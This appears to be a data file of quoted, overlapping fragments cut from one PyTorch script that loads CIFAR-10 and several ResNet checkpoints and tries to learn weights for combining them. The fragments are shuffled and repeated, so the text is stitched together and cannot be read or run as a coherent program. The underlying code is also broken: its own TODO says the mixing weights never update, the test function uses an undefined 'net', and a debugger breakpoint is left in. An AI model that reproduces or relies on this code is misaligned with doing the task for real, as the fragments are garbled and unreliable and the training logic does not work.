"data augmentations?') parser.add_argument('--lr', default=1e-2, type=float, help='learning rate') parser.add_argument('--iter', default=100, type=int, help='number of total",
"Using {} models {}'.format(num_models, args.model)) model = model_dict[args.model] model = model.to(device) model.train() ##",
"int(i / 1000) )) # state = { # 'net' : net.state_dict(), #",
"+= predicted.eq(targets).sum().item() # save loss over the whole test set at TB test_acc",
"help='use data augmentations?') parser.add_argument('--lr', default=1e-2, type=float, help='learning rate') parser.add_argument('--iter', default=100, type=int, help='number of",
"(0.2023, 0.1994, 0.2010)), ]) testset = torchvision.datasets.CIFAR10(root='data', train=False, download=True, transform=transform_test) testloader = torch.utils.data.DataLoader(",
"model_params = torch.nn.Parameter( model_params + alphas[ii] * checkpoint[name] ) batch = next(loader) inputs,",
"batch inputs = inputs.to(device) targets = targets.to(device) outputs = model(inputs) loss = criterion(outputs,",
"= parser.parse_args() # use this to init weight as required torch.manual_seed(0) device =",
"# targets = targets.to(device) # [bs] # outputs = net(inputs) # loss =",
"batch = next(loader) inputs, targets = batch inputs = inputs.to(device) targets = targets.to(device)",
"iteration {} K'.format(test_loss, test_acc, int( i / 1000)) ) # state = {",
"batch = next(loader) # inputs, targets = batch # inputs = inputs.to(device) #",
"'R18_augm2', 'R18_augm3'], 'resnet50': ['R50_augm1', 'R50_augm2', 'R50_augm3'], } chpt_name = 'net_80.pth' def test(model, testloader,",
"torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog',",
"required torch.manual_seed(0) device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") classes = ('plane', 'car',",
"targets.size(0) # correct_samples += predicted.eq(targets).sum().item() # train_acc = correct_samples / total_samples # #",
"= net(inputs) # loss = criterion(outputs, targets) # optimizer.zero_grad() # loss.backward() # optimizer.step()",
"import torchvision.transforms as transforms from models import * parser = argparse.ArgumentParser() parser.add_argument('--name', default='',",
"run') args = parser.parse_args() # use this to init weight as required torch.manual_seed(0)",
"% args.iter_save == 0: # test_loss, test_acc = test(net, testloader, criterion, best_acc) #",
"= SummaryWriter(log_dir=os.path.join(checkpoint_dir, 'optim')) ## Data print('=> Preparing data..') transform_test = transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914,",
"1, 'Alphas should sum to 1' num_iters = args.iter criterion = nn.CrossEntropyLoss() alphas",
"# logging.info('=> Accuracy improved from {} --> {} at iteration {} K'.format(best_acc, test_acc,",
"# 'acc' : test_acc, # 'iter' : i, # } # torch.save(state, os.path.join(checkpoint_dir,",
"as transforms from models import * parser = argparse.ArgumentParser() parser.add_argument('--name', default='', type=str, help='name",
"= criterion(outputs, targets) print(alphas) # print(list(model.parameters())[0][0]) optimizer.zero_grad() loss.backward() optimizer.step() print(alphas) # print(list(model.parameters())[0][0]) pdb.set_trace()",
"else: for name, model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params",
"# save loss over the whole test set at TB test_acc = 100.",
"Main optimization loop ## TODO: alphas are not updating -- solve this issue",
"K'.format(best_acc, test_acc, int(i / 1000) )) # state = { # 'net' :",
"0.4465), (0.2023, 0.1994, 0.2010)), ]) testset = torchvision.datasets.CIFAR10(root='data', train=False, download=True, transform=transform_test) testloader =",
"## Init alphas and optimizer alphas = torch.rand(num_models) / num_models alphas[-1] = 1",
"loss.backward() optimizer.step() print(alphas) # print(list(model.parameters())[0][0]) pdb.set_trace() # criterion = nn.CrossEntropyLoss() # optimizer =",
": test_acc, # 'iter' : i, # } # torch.save(state, os.path.join(checkpoint_dir, 'net_{}.pth'.format( int(",
"optimizer.step() print(alphas) # print(list(model.parameters())[0][0]) pdb.set_trace() # criterion = nn.CrossEntropyLoss() # optimizer = optim.SGD(net.parameters(),",
"whole test set at TB test_acc = 100. * correct_samples / total_samples total_test_loss",
"optimizer = optim.Adam([alphas], lr=args.lr, betas=(0.9, 0.999)) ### Main optimization loop ## TODO: alphas",
") loader = iter(testloader) ## Create model model_names = chpt_augm_dict[args.model] if args.use_augm else",
"= argparse.ArgumentParser() parser.add_argument('--name', default='', type=str, help='name of experiment') parser.add_argument('--model', default='resnet18', type=str, help='model to",
"args.iter_save == 0: # test_loss, test_acc = test(net, testloader, criterion, best_acc) # logging.info('=>",
"testloader, criterion, best_acc) # logging.info('=> Saving model with Loss: {:.5f} -- ACC: {}",
"optimizer.step() # scheduler.step() # train_loss += loss.item() # _, predicted = outputs.max(1) #",
"23m 'resnet101': ResNet101(), # 42m 'resnet152': ResNet152(), # 58m 'vgg19' : VGG('VGG19'), }",
"optimizer.zero_grad() loss.backward() optimizer.step() print(alphas) # print(list(model.parameters())[0][0]) pdb.set_trace() # criterion = nn.CrossEntropyLoss() # optimizer",
"correct_samples / total_samples # # log metrics to TB every 100 iterations #",
"for batch_idx, (inputs, targets) in enumerate(testloader): inputs = inputs.to(device) # [bs, 3, 32,",
"= model.to(device) model.train() ## Init alphas and optimizer alphas = torch.rand(num_models) / num_models",
"print(alphas) # print(list(model.parameters())[0][0]) pdb.set_trace() # criterion = nn.CrossEntropyLoss() # optimizer = optim.SGD(net.parameters(), lr=args.lr,",
"net.state_dict(), # 'acc' : test_acc, # 'iter' : i, # } # torch.save(state,",
"default=100, type=int, help='number of total iterations to run') args = parser.parse_args() # use",
"test_loss = 0 total_samples, correct_samples = 0, 0 with torch.no_grad(): for batch_idx, (inputs,",
"test_loss, test_acc = test(net, testloader, criterion, best_acc) # logging.info('=> Saving model with Loss:",
"# 11m params 'resnet34' : ResNet34(), # 21m 'resnet50' : ResNet50(), # 23m",
"testloader, criterion, best_acc): net.eval() test_loss = 0 total_samples, correct_samples = 0, 0 with",
"parser.parse_args() # use this to init weight as required torch.manual_seed(0) device = torch.device(\"cuda\"",
"32, 32] targets = targets.to(device) # [bs] outputs = model(inputs) loss = criterion(outputs,",
"criterion = nn.CrossEntropyLoss() alphas = torch.nn.Parameter(alphas) optimizer = optim.Adam([alphas], lr=args.lr, betas=(0.9, 0.999)) ###",
"loss.item() # _, predicted = outputs.max(1) # total_samples += targets.size(0) # correct_samples +=",
"transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ]) testset = torchvision.datasets.CIFAR10(root='data', train=False,",
"sampler = data_sampler(testset, shuffle=False), num_workers = 4, ) loader = iter(testloader) ## Create",
"= test(net, testloader, criterion, best_acc) # logging.info('=> Saving model with Loss: {:.5f} --",
"import torch.nn as nn import torch.optim as optim import torch.nn.functional as F import",
"# print(list(model.parameters())[0][0]) pdb.set_trace() # criterion = nn.CrossEntropyLoss() # optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9,",
") # state = { # 'net' : net.state_dict(), # 'acc' : test_acc,",
"1000) )) # state = { # 'net' : net.state_dict(), # 'acc' :",
"= criterion(outputs, targets) test_loss += loss.item() _, predicted = outputs.max(1) total_samples += targets.size(0)",
"logging.info('=> Saving model with Loss: {:.5f} -- ACC: {} at iteration {} K'.format(test_loss,",
"help='number of total iterations to run') args = parser.parse_args() # use this to",
"# logging.info('=> Saving model with Loss: {:.5f} -- ACC: {} at iteration {}",
"# 'iter' : i, # } # torch.save(state, os.path.join(checkpoint_dir, 'net_{}.pth'.format( int( i /",
"correct_samples += predicted.eq(targets).sum().item() # train_acc = correct_samples / total_samples # # log metrics",
"= False, # sampler = data_sampler(testset, shuffle=False), num_workers = 4, ) loader =",
"if ii==0: model.load_state_dict(checkpoint) for name, model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params =",
"cudnn from torch.utils.tensorboard import SummaryWriter import torchvision import torchvision.transforms as transforms from models",
"alphas[ii] ) else: for name, model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params =",
"init weight as required torch.manual_seed(0) device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") classes",
"of total iterations to run') args = parser.parse_args() # use this to init",
"+= loss.item() # _, predicted = outputs.max(1) # total_samples += targets.size(0) # correct_samples",
"= len(model_names) print('=> Using {} models {}'.format(num_models, args.model)) model = model_dict[args.model] model =",
") batch = next(loader) inputs, targets = batch inputs = inputs.to(device) targets =",
"i / 1000)) ) # state = { # 'net' : net.state_dict(), #",
"42m 'resnet152': ResNet152(), # 58m 'vgg19' : VGG('VGG19'), } chpt_vanilla_dict = { 'resnet18':",
"= 1 - sum(alphas[:-1]) assert sum(alphas).item() == 1, 'Alphas should sum to 1'",
"model model_names = chpt_augm_dict[args.model] if args.use_augm else chpt_vanilla_dict[args.model] num_models = len(model_names) print('=> Using",
"0.999)) ### Main optimization loop ## TODO: alphas are not updating -- solve",
"Data print('=> Preparing data..') transform_test = transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994,",
"i) # writer_train.add_scalar('train_loss', train_loss, i) # # test model and save it every",
"'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck') model_dict = { 'resnet18'",
"alphas[-1] = 1 - sum(alphas[:-1]) assert sum(alphas).item() == 1, 'Alphas should sum to",
"import torch import torch.nn as nn import torch.optim as optim import torch.nn.functional as",
"'truck') model_dict = { 'resnet18' : ResNet18(), # 11m params 'resnet34' : ResNet34(),",
"type=str, help='name of experiment') parser.add_argument('--model', default='resnet18', type=str, help='model to train') parser.add_argument('--use_augm', action='store_true', help='use",
"'R18_augm3'], 'resnet50': ['R50_augm1', 'R50_augm2', 'R50_augm3'], } chpt_name = 'net_80.pth' def test(model, testloader, criterion,",
"F import torch.backends.cudnn as cudnn from torch.utils.tensorboard import SummaryWriter import torchvision import torchvision.transforms",
"optimization loop ## TODO: alphas are not updating -- solve this issue for",
"# [bs] # outputs = net(inputs) # loss = criterion(outputs, targets) # optimizer.zero_grad()",
"# inputs, targets = batch # inputs = inputs.to(device) # [bs, 3, 32,",
"criterion = nn.CrossEntropyLoss() # optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=1e-4) # for idx",
"print(\"TRAINING IS DONE!\") # break # train_loss = 0 # total_samples, correct_samples =",
"best_acc): net.eval() test_loss = 0 total_samples, correct_samples = 0, 0 with torch.no_grad(): for",
"idx in pbar: # i = idx + args.start_iter # if i >",
"= criterion(outputs, targets) # optimizer.zero_grad() # loss.backward() # optimizer.step() # scheduler.step() # train_loss",
"import os, pdb, logging, argparse import torch import torch.nn as nn import torch.optim",
"checkpoint_dir = 'results_ensembles/{}'.format(args.name) if not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir) ## Logging logging.basicConfig(filename=os.path.join(checkpoint_dir, 'optim.log'), level=logging.INFO) console",
"32] # targets = targets.to(device) # [bs] # outputs = net(inputs) # loss",
": VGG('VGG19'), } chpt_vanilla_dict = { 'resnet18': ['R18_1', 'R18_2', 'R18_3'], 'resnet50': ['R50_1', 'R50_2',",
"1 - sum(alphas[:-1]) assert sum(alphas).item() == 1, 'Alphas should sum to 1' num_iters",
"IS DONE!\") # break # train_loss = 0 # total_samples, correct_samples = 0,",
"'net' : net.state_dict(), # 'acc' : test_acc, # 'iter' : i, # }",
"writer_test = SummaryWriter(log_dir=os.path.join(checkpoint_dir, 'optim')) ## Data print('=> Preparing data..') transform_test = transforms.Compose([ transforms.ToTensor(),",
"writer_train.add_scalar('train_loss', train_loss, i) # # test model and save it every 5000 iterations",
"torch.optim as optim import torch.nn.functional as F import torch.backends.cudnn as cudnn from torch.utils.tensorboard",
"['R18_augm1', 'R18_augm2', 'R18_augm3'], 'resnet50': ['R50_augm1', 'R50_augm2', 'R50_augm3'], } chpt_name = 'net_80.pth' def test(model,",
"model with Loss: {:.5f} -- ACC: {} at iteration {} K'.format(test_loss, test_acc, int(",
"/ (batch_idx+1) return total_test_loss, test_acc def main(): checkpoint_dir = 'results_ensembles/{}'.format(args.name) if not os.path.exists(checkpoint_dir):",
"correct_samples / total_samples total_test_loss = test_loss / (batch_idx+1) return total_test_loss, test_acc def main():",
"batch_size = len(testset), batch_size = 1000, shuffle = False, # sampler = data_sampler(testset,",
"it in range(num_iters): # load model weights and multiply with alphas for ii,",
"'net_80.pth' def test(model, testloader, criterion, best_acc): net.eval() test_loss = 0 total_samples, correct_samples =",
"loss = criterion(outputs, targets) test_loss += loss.item() _, predicted = outputs.max(1) total_samples +=",
"model_name in enumerate(model_names): model_path = os.path.join('results', model_name, chpt_name) checkpoint = torch.load(model_path)['net'] if ii==0:",
"# if test_acc > best_acc: # logging.info('=> Accuracy improved from {} --> {}",
"and save it every 5000 iterations # if i % args.iter_save == 0:",
"if test_acc > best_acc: # logging.info('=> Accuracy improved from {} --> {} at",
"args = parser.parse_args() # use this to init weight as required torch.manual_seed(0) device",
"logging.getLogger().addHandler(console) console.setLevel(logging.INFO) logging.info(args) writer_test = SummaryWriter(log_dir=os.path.join(checkpoint_dir, 'optim')) ## Data print('=> Preparing data..') transform_test",
"# loss = criterion(outputs, targets) # optimizer.zero_grad() # loss.backward() # optimizer.step() # scheduler.step()",
"total_samples += targets.size(0) correct_samples += predicted.eq(targets).sum().item() # save loss over the whole test",
"test_loss, i) # if test_acc > best_acc: # logging.info('=> Accuracy improved from {}",
"optimizer.zero_grad() # loss.backward() # optimizer.step() # scheduler.step() # train_loss += loss.item() # _,",
"{} at iteration {} K'.format(test_loss, test_acc, int( i / 1000)) ) # state",
"# sampler = data_sampler(testset, shuffle=False), num_workers = 4, ) loader = iter(testloader) ##",
"logging, argparse import torch import torch.nn as nn import torch.optim as optim import",
"else \"cpu\") classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship',",
"= optim.Adam([alphas], lr=args.lr, betas=(0.9, 0.999)) ### Main optimization loop ## TODO: alphas are",
"scheduler.step() # train_loss += loss.item() # _, predicted = outputs.max(1) # total_samples +=",
"11m params 'resnet34' : ResNet34(), # 21m 'resnet50' : ResNet50(), # 23m 'resnet101':",
"correct_samples = 0, 0 with torch.no_grad(): for batch_idx, (inputs, targets) in enumerate(testloader): inputs",
"model = model.to(device) model.train() ## Init alphas and optimizer alphas = torch.rand(num_models) /",
"shuffle = False, # sampler = data_sampler(testset, shuffle=False), num_workers = 4, ) loader",
"# net.train() # writer_test.add_scalar('test_acc', test_acc, i) # writer_test.add_scalar('test_loss', test_loss, i) # if test_acc",
"sum(alphas[:-1]) assert sum(alphas).item() == 1, 'Alphas should sum to 1' num_iters = args.iter",
"# [bs, 3, 32, 32] # targets = targets.to(device) # [bs] # outputs",
"ResNet50(), # 23m 'resnet101': ResNet101(), # 42m 'resnet152': ResNet152(), # 58m 'vgg19' :",
"= next(loader) # inputs, targets = batch # inputs = inputs.to(device) # [bs,",
"ii==0: model.load_state_dict(checkpoint) for name, model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter(",
"= 0 # total_samples, correct_samples = 0, 0 # batch = next(loader) #",
"= torch.rand(num_models) / num_models alphas[-1] = 1 - sum(alphas[:-1]) assert sum(alphas).item() == 1,",
"model.train() ## Init alphas and optimizer alphas = torch.rand(num_models) / num_models alphas[-1] =",
"console = logging.StreamHandler() logging.getLogger().addHandler(console) console.setLevel(logging.INFO) logging.info(args) writer_test = SummaryWriter(log_dir=os.path.join(checkpoint_dir, 'optim')) ## Data print('=>",
"## TODO: alphas are not updating -- solve this issue for it in",
"test(model, testloader, criterion, best_acc): net.eval() test_loss = 0 total_samples, correct_samples = 0, 0",
"{ 'resnet18': ['R18_1', 'R18_2', 'R18_3'], 'resnet50': ['R50_1', 'R50_2', 'R50_3'], } chpt_augm_dict = {",
"total_test_loss = test_loss / (batch_idx+1) return total_test_loss, test_acc def main(): checkpoint_dir = 'results_ensembles/{}'.format(args.name)",
"loss = criterion(outputs, targets) print(alphas) # print(list(model.parameters())[0][0]) optimizer.zero_grad() loss.backward() optimizer.step() print(alphas) # print(list(model.parameters())[0][0])",
"i, # } # torch.save(state, os.path.join(checkpoint_dir, 'net_best.pth')) # best_acc = test_acc if __name__",
"predicted = outputs.max(1) total_samples += targets.size(0) correct_samples += predicted.eq(targets).sum().item() # save loss over",
"criterion(outputs, targets) # optimizer.zero_grad() # loss.backward() # optimizer.step() # scheduler.step() # train_loss +=",
"if not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir) ## Logging logging.basicConfig(filename=os.path.join(checkpoint_dir, 'optim.log'), level=logging.INFO) console = logging.StreamHandler() logging.getLogger().addHandler(console)",
"= next(loader) inputs, targets = batch inputs = inputs.to(device) targets = targets.to(device) outputs",
"= iter(testloader) ## Create model model_names = chpt_augm_dict[args.model] if args.use_augm else chpt_vanilla_dict[args.model] num_models",
"= correct_samples / total_samples # # log metrics to TB every 100 iterations",
"+ args.start_iter # if i > args.iter: # print(\"TRAINING IS DONE!\") # break",
"i, # } # torch.save(state, os.path.join(checkpoint_dir, 'net_{}.pth'.format( int( i / 1000) ))) #",
"help='model to train') parser.add_argument('--use_augm', action='store_true', help='use data augmentations?') parser.add_argument('--lr', default=1e-2, type=float, help='learning rate')",
"parser.add_argument('--iter', default=100, type=int, help='number of total iterations to run') args = parser.parse_args() #",
"# train_loss = 0 # total_samples, correct_samples = 0, 0 # batch =",
"at iteration {} K'.format(best_acc, test_acc, int(i / 1000) )) # state = {",
"chpt_vanilla_dict = { 'resnet18': ['R18_1', 'R18_2', 'R18_3'], 'resnet50': ['R50_1', 'R50_2', 'R50_3'], } chpt_augm_dict",
"solve this issue for it in range(num_iters): # load model weights and multiply",
"torch.nn.functional as F import torch.backends.cudnn as cudnn from torch.utils.tensorboard import SummaryWriter import torchvision",
"= 'results_ensembles/{}'.format(args.name) if not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir) ## Logging logging.basicConfig(filename=os.path.join(checkpoint_dir, 'optim.log'), level=logging.INFO) console =",
"tqdm import os, pdb, logging, argparse import torch import torch.nn as nn import",
"= len(testset), batch_size = 1000, shuffle = False, # sampler = data_sampler(testset, shuffle=False),",
"= 'net_80.pth' def test(model, testloader, criterion, best_acc): net.eval() test_loss = 0 total_samples, correct_samples",
"# total_samples += targets.size(0) # correct_samples += predicted.eq(targets).sum().item() # train_acc = correct_samples /",
"# i = idx + args.start_iter # if i > args.iter: # print(\"TRAINING",
": i, # } # torch.save(state, os.path.join(checkpoint_dir, 'net_{}.pth'.format( int( i / 1000) )))",
"inputs.to(device) # [bs, 3, 32, 32] targets = targets.to(device) # [bs] outputs =",
"not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir) ## Logging logging.basicConfig(filename=os.path.join(checkpoint_dir, 'optim.log'), level=logging.INFO) console = logging.StreamHandler() logging.getLogger().addHandler(console) console.setLevel(logging.INFO)",
"import SummaryWriter import torchvision import torchvision.transforms as transforms from models import * parser",
"loop ## TODO: alphas are not updating -- solve this issue for it",
"params 'resnet34' : ResNet34(), # 21m 'resnet50' : ResNet50(), # 23m 'resnet101': ResNet101(),",
"type=str, help='model to train') parser.add_argument('--use_augm', action='store_true', help='use data augmentations?') parser.add_argument('--lr', default=1e-2, type=float, help='learning",
"# for idx in pbar: # i = idx + args.start_iter # if",
"1' num_iters = args.iter criterion = nn.CrossEntropyLoss() alphas = torch.nn.Parameter(alphas) optimizer = optim.Adam([alphas],",
"checkpoint[name] ) batch = next(loader) inputs, targets = batch inputs = inputs.to(device) targets",
"in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params * alphas[ii] ) else:",
"# train_acc = correct_samples / total_samples # # log metrics to TB every",
"it every 5000 iterations # if i % args.iter_save == 0: # test_loss,",
"1000)) ) # state = { # 'net' : net.state_dict(), # 'acc' :",
"# criterion = nn.CrossEntropyLoss() # optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=1e-4) # for",
"loader = iter(testloader) ## Create model model_names = chpt_augm_dict[args.model] if args.use_augm else chpt_vanilla_dict[args.model]",
"augmentations?') parser.add_argument('--lr', default=1e-2, type=float, help='learning rate') parser.add_argument('--iter', default=100, type=int, help='number of total iterations",
"= torch.utils.data.DataLoader( testset, # batch_size = len(testset), batch_size = 1000, shuffle = False,",
"0 # total_samples, correct_samples = 0, 0 # batch = next(loader) # inputs,",
"model weights and multiply with alphas for ii, model_name in enumerate(model_names): model_path =",
"total iterations to run') args = parser.parse_args() # use this to init weight",
"net.train() # writer_test.add_scalar('test_acc', test_acc, i) # writer_test.add_scalar('test_loss', test_loss, i) # if test_acc >",
"# test model and save it every 5000 iterations # if i %",
"# if i > args.iter: # print(\"TRAINING IS DONE!\") # break # train_loss",
"i / 1000) ))) # net.train() # writer_test.add_scalar('test_acc', test_acc, i) # writer_test.add_scalar('test_loss', test_loss,",
": ResNet18(), # 11m params 'resnet34' : ResNet34(), # 21m 'resnet50' : ResNet50(),",
"transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ]) testset = torchvision.datasets.CIFAR10(root='data', train=False, download=True,",
"[bs, 3, 32, 32] # targets = targets.to(device) # [bs] # outputs =",
"'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck') model_dict = { 'resnet18' : ResNet18(),",
"model and save it every 5000 iterations # if i % args.iter_save ==",
"0, 0 with torch.no_grad(): for batch_idx, (inputs, targets) in enumerate(testloader): inputs = inputs.to(device)",
"= inputs.to(device) # [bs, 3, 32, 32] targets = targets.to(device) # [bs] outputs",
"'resnet50': ['R50_1', 'R50_2', 'R50_3'], } chpt_augm_dict = { 'resnet18': ['R18_augm1', 'R18_augm2', 'R18_augm3'], 'resnet50':",
"args.start_iter # if i > args.iter: # print(\"TRAINING IS DONE!\") # break #",
"print(list(model.parameters())[0][0]) optimizer.zero_grad() loss.backward() optimizer.step() print(alphas) # print(list(model.parameters())[0][0]) pdb.set_trace() # criterion = nn.CrossEntropyLoss() #",
"'Alphas should sum to 1' num_iters = args.iter criterion = nn.CrossEntropyLoss() alphas =",
"logging.basicConfig(filename=os.path.join(checkpoint_dir, 'optim.log'), level=logging.INFO) console = logging.StreamHandler() logging.getLogger().addHandler(console) console.setLevel(logging.INFO) logging.info(args) writer_test = SummaryWriter(log_dir=os.path.join(checkpoint_dir, 'optim'))",
"Accuracy improved from {} --> {} at iteration {} K'.format(best_acc, test_acc, int(i /",
"-- solve this issue for it in range(num_iters): # load model weights and",
"test_acc = test(net, testloader, criterion, best_acc) # logging.info('=> Saving model with Loss: {:.5f}",
"pdb, logging, argparse import torch import torch.nn as nn import torch.optim as optim",
"= targets.to(device) # [bs] # outputs = net(inputs) # loss = criterion(outputs, targets)",
"from torch.utils.tensorboard import SummaryWriter import torchvision import torchvision.transforms as transforms from models import",
"# batch_size = len(testset), batch_size = 1000, shuffle = False, # sampler =",
"targets.size(0) correct_samples += predicted.eq(targets).sum().item() # save loss over the whole test set at",
"loss over the whole test set at TB test_acc = 100. * correct_samples",
"checkpoint = torch.load(model_path)['net'] if ii==0: model.load_state_dict(checkpoint) for name, model_params in model.named_parameters(): if not",
"alphas[ii] * checkpoint[name] ) batch = next(loader) inputs, targets = batch inputs =",
"'deer', 'dog', 'frog', 'horse', 'ship', 'truck') model_dict = { 'resnet18' : ResNet18(), #",
"= { # 'net' : net.state_dict(), # 'acc' : test_acc, # 'iter' :",
"parser.add_argument('--name', default='', type=str, help='name of experiment') parser.add_argument('--model', default='resnet18', type=str, help='model to train') parser.add_argument('--use_augm',",
"type=int, help='number of total iterations to run') args = parser.parse_args() # use this",
"iterations # if i % 100 == 0: # writer_train.add_scalar('train_acc', train_acc, i) #",
"model_dict = { 'resnet18' : ResNet18(), # 11m params 'resnet34' : ResNet34(), #",
"inputs.to(device) targets = targets.to(device) outputs = model(inputs) loss = criterion(outputs, targets) print(alphas) #",
"train') parser.add_argument('--use_augm', action='store_true', help='use data augmentations?') parser.add_argument('--lr', default=1e-2, type=float, help='learning rate') parser.add_argument('--iter', default=100,",
"correct_samples = 0, 0 # batch = next(loader) # inputs, targets = batch",
"testset, # batch_size = len(testset), batch_size = 1000, shuffle = False, # sampler",
"model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params + alphas[ii] *",
"for ii, model_name in enumerate(model_names): model_path = os.path.join('results', model_name, chpt_name) checkpoint = torch.load(model_path)['net']",
"i % args.iter_save == 0: # test_loss, test_acc = test(net, testloader, criterion, best_acc)",
"loss.item() _, predicted = outputs.max(1) total_samples += targets.size(0) correct_samples += predicted.eq(targets).sum().item() # save",
"= torch.nn.Parameter( model_params + alphas[ii] * checkpoint[name] ) batch = next(loader) inputs, targets",
"TODO: alphas are not updating -- solve this issue for it in range(num_iters):",
"save it every 5000 iterations # if i % args.iter_save == 0: #",
"test(net, testloader, criterion, best_acc) # logging.info('=> Saving model with Loss: {:.5f} -- ACC:",
"alphas and optimizer alphas = torch.rand(num_models) / num_models alphas[-1] = 1 - sum(alphas[:-1])",
"are not updating -- solve this issue for it in range(num_iters): # load",
"{ 'resnet18': ['R18_augm1', 'R18_augm2', 'R18_augm3'], 'resnet50': ['R50_augm1', 'R50_augm2', 'R50_augm3'], } chpt_name = 'net_80.pth'",
"total_samples, correct_samples = 0, 0 with torch.no_grad(): for batch_idx, (inputs, targets) in enumerate(testloader):",
"chpt_vanilla_dict[args.model] num_models = len(model_names) print('=> Using {} models {}'.format(num_models, args.model)) model = model_dict[args.model]",
"targets = batch inputs = inputs.to(device) targets = targets.to(device) outputs = model(inputs) loss",
"# [bs, 3, 32, 32] targets = targets.to(device) # [bs] outputs = model(inputs)",
"= torch.nn.Parameter(alphas) optimizer = optim.Adam([alphas], lr=args.lr, betas=(0.9, 0.999)) ### Main optimization loop ##",
"model_path = os.path.join('results', model_name, chpt_name) checkpoint = torch.load(model_path)['net'] if ii==0: model.load_state_dict(checkpoint) for name,",
"in enumerate(model_names): model_path = os.path.join('results', model_name, chpt_name) checkpoint = torch.load(model_path)['net'] if ii==0: model.load_state_dict(checkpoint)",
"# # test model and save it every 5000 iterations # if i",
"predicted = outputs.max(1) # total_samples += targets.size(0) # correct_samples += predicted.eq(targets).sum().item() # train_acc",
"1000) ))) # net.train() # writer_test.add_scalar('test_acc', test_acc, i) # writer_test.add_scalar('test_loss', test_loss, i) #",
"# loss.backward() # optimizer.step() # scheduler.step() # train_loss += loss.item() # _, predicted",
": ResNet50(), # 23m 'resnet101': ResNet101(), # 42m 'resnet152': ResNet152(), # 58m 'vgg19'",
"{} K'.format(best_acc, test_acc, int(i / 1000) )) # state = { # 'net'",
"# writer_test.add_scalar('test_acc', test_acc, i) # writer_test.add_scalar('test_loss', test_loss, i) # if test_acc > best_acc:",
"Loss: {:.5f} -- ACC: {} at iteration {} K'.format(test_loss, test_acc, int( i /",
"_, predicted = outputs.max(1) # total_samples += targets.size(0) # correct_samples += predicted.eq(targets).sum().item() #",
"if i % args.iter_save == 0: # test_loss, test_acc = test(net, testloader, criterion,",
"model.to(device) model.train() ## Init alphas and optimizer alphas = torch.rand(num_models) / num_models alphas[-1]",
"optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=1e-4) # for idx in pbar: # i",
"'R18_2', 'R18_3'], 'resnet50': ['R50_1', 'R50_2', 'R50_3'], } chpt_augm_dict = { 'resnet18': ['R18_augm1', 'R18_augm2',",
"= inputs.to(device) targets = targets.to(device) outputs = model(inputs) loss = criterion(outputs, targets) print(alphas)",
"with alphas for ii, model_name in enumerate(model_names): model_path = os.path.join('results', model_name, chpt_name) checkpoint",
"targets = batch # inputs = inputs.to(device) # [bs, 3, 32, 32] #",
"== 0: # writer_train.add_scalar('train_acc', train_acc, i) # writer_train.add_scalar('train_loss', train_loss, i) # # test",
"os.path.join(checkpoint_dir, 'net_{}.pth'.format( int( i / 1000) ))) # net.train() # writer_test.add_scalar('test_acc', test_acc, i)",
"} # torch.save(state, os.path.join(checkpoint_dir, 'net_best.pth')) # best_acc = test_acc if __name__ == '__main__':",
"rate') parser.add_argument('--iter', default=100, type=int, help='number of total iterations to run') args = parser.parse_args()",
"torch.backends.cudnn as cudnn from torch.utils.tensorboard import SummaryWriter import torchvision import torchvision.transforms as transforms",
"= batch inputs = inputs.to(device) targets = targets.to(device) outputs = model(inputs) loss =",
"'R50_augm2', 'R50_augm3'], } chpt_name = 'net_80.pth' def test(model, testloader, criterion, best_acc): net.eval() test_loss",
"## Data print('=> Preparing data..') transform_test = transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023,",
"set at TB test_acc = 100. * correct_samples / total_samples total_test_loss = test_loss",
"targets = targets.to(device) outputs = model(inputs) loss = criterion(outputs, targets) print(alphas) # print(list(model.parameters())[0][0])",
"0 # batch = next(loader) # inputs, targets = batch # inputs =",
"0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ]) testset = torchvision.datasets.CIFAR10(root='data', train=False, download=True, transform=transform_test) testloader",
"every 5000 iterations # if i % args.iter_save == 0: # test_loss, test_acc",
"/ 1000) ))) # net.train() # writer_test.add_scalar('test_acc', test_acc, i) # writer_test.add_scalar('test_loss', test_loss, i)",
"range(num_iters): # load model weights and multiply with alphas for ii, model_name in",
"torch.utils.data.DataLoader( testset, # batch_size = len(testset), batch_size = 1000, shuffle = False, #",
"+= targets.size(0) correct_samples += predicted.eq(targets).sum().item() # save loss over the whole test set",
"model_params = torch.nn.Parameter( model_params * alphas[ii] ) else: for name, model_params in model.named_parameters():",
"targets) # optimizer.zero_grad() # loss.backward() # optimizer.step() # scheduler.step() # train_loss += loss.item()",
"# print(\"TRAINING IS DONE!\") # break # train_loss = 0 # total_samples, correct_samples",
